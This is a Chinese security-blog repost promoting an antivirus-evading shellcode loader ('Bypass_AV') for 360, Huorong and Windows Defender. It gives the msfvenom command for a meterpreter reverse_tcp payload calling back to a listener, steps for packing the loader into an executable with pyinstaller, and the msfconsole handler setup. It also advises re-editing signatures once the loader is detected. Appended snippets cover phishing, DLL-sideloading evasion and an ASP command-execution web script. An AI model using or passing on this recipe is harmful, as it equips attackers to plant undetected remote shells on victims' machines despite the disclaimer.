免杀ShellCode加载器 ,360、火绒、Windows Defender

VSole2022-08-29 06:37:55

Bypass_AV msf免杀,ShellCode免杀加载器 ,免杀shellcode执行程序 ,360&火绒&Windows Defender

代码够简单,估计要不了多久就进特征库了,被杀了再去改几个特征码照样又可以免杀,作者的github保持更新,可以去瞅瞅。

项目地址:https://github.com/Axx8/Bypass_AV

环境

2022年5月8日 测试可以免杀国内杀软 火绒&360及Windows Defender
Windows 10 64位 360&火绒&Windows Defender
Windows 7 64位 或以上操作系统应该都没问题(没有测试)

该项目仅供网络安全研究使用,禁止使用该项目进行违法操作,否则自行承担后果,请各位遵守《中华人民共和国网络安全法》!!!

代码未经过大量测试,如发现问题请提交 issue。

使用msfvenom

生成ShellCode

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.100 lport=8080 --encrypt base64 -f c

注意:ShellCode 需要是64位的

加载器

将生成的ShellCode 填至 Bypass_AV.py 里的 ShellCode = '''ShellCode''' 处

注意:保留原始ShellCode 里的双引号 "

示例:

最终格式:

打包成可执行程序

编译

Python 3.8.6

pyinstaller 4.7

pip install pyinstaller 
pyinstaller -F -w Bypss_AV.py

生成Bypass_AV.exe在dist目录中

运行监听

msfconsole
msf6 > use exploit/multi/handler 
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 0.0.0.0
msf6 exploit(multi/handler) > set lport 8080
msf6 exploit(multi/handler) > run

Bypass_360视频

https://user-images.githubusercontent.com/34683107/167286823-a93fdd69-547e-4adc-9ae5-171fb0e919ca.mov

Bypass_火绒视频

https://user-images.githubusercontent.com/34683107/167286897-a482c486-c3e9-4f69-ae55-98afd2ff1ed7.mov

Bypass_Windows Defender视频

https://user-images.githubusercontent.com/34683107/167286874-9413611e-c2be-4cfb-ba51-f95ebe5518af.mov

免杀火绒
本作品采用《CC 协议》,转载必须注明作者和本文链接
今天脑子里面蹦出来个想法,杀木马然后cs上线,本来想让cs与msf联动的,但是出了点小问题,还是先研究火绒吧。
前言一种规避软检测的技术就是内存加密技术。最后,在实现内存加密的过程中,也发现了其中不足并提出改进的方法。它允许应用程序拦截并处理Windows消息或指定事件,当指定的消息发出后,hook程序就可以在消息到达目标窗口之前将其捕获,从而得到对消息的控制权,进而可以对该消息进行处理或修改,加入我们所需的功能。IRP hook,一种内核层的hook技术,通过修改IRP结构体中某个成员变量指向自己的补丁函数来实现。
Bypass_AV msf,ShellCode加载器 ,shellcode执行程序 ,360&火绒&Windows Defender。代码够简单,估计要不了多久就进特征库了,被了再去改几个特征码照样又可以,保持更新。
钓鱼常用手法总结
2022-03-24 13:48:29
雷神众测拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经雷神众测允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。
CS姿势
2022-08-02 16:42:30
花指令,在程序 shellcode 或特征代码区域增添垃圾指令,增加的垃圾指令不会影响文件执行,在动态查杀或者文件hash对比是校验会不一致。加壳,比如upx加壳等,一般文件落地后对比哈希值也可绕过软。二次编译,一般用于对shellcode进行二次编译bypass软。安装火绒,查杀CS上线加壳另外再加壳测试。赛门铁克也未报毒,其它软不放图了。
0X01起源在攻防演练中通过运行恶意代码连接C2是最常用的手段,但是由于对抗程度的提升。以360、天擎为代表的杀毒软件针对信任链的检测,已经变得愈来愈成熟。这里我们可以理解为,攻击者通过利用"白加黑"这种攻击方法。当攻击者通过社工钓鱼的手段,使得目标下载恶意的文件到目标自己的计算机上,并点击运行白文件时,该文件会在运行时执行恶意DLL。
Windows通用shellcode生成器,能够绕过Microsoft Defender、360、火绒、Panda等软的查杀。
请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。0x02 ASP执行命令脚本这个脚本会被网站安全狗查杀,特征:Shell.Application,当Wscript.shell组件被卸载不可用时就会提示:[Err] ActiveX 部件不能创建对象,这时可尝试用这个组件来执行命令。<%Set SA = CreateObjectSA.ShellExecute "cmd.exe"," /c set > C:\NpointSoft\npointhost2.2.0\web\1.txt","C:\NpointSoft\npointhost2.2.0\web","",0%>
服务器装了多个软,上线之后很多操作也受限,这时候可能比较好的解决方法就是使用自己研发的远控,……
VSole
网络安全专家